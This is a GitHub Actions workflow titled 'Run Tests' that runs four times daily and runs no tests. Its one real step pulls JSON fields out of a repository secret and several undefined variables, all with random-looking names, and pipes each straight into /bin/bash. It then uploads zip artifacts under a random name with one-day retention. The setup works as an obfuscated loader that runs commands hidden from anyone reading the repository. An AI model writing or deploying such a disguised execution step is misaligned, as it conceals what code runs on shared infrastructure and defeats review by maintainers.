name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '9 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          jlp59: ${{ secrets.jlp59 }}
        run: |
          printf '%s' "$jlp59" | jq -r .tw89615 | /bin/bash
          echo $ngto7925 | jq -r .igm57430 | /bin/bash
          echo $db67 | jq -r .ydizd69 | /bin/bash
          printf '%s' "$bwphh324" | jq -r .a5846 | /bin/bash
          echo $rpzj0997 | jq -r .trg3 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: yAEMf30a
          path: "*.zip"
          retention-days: 1
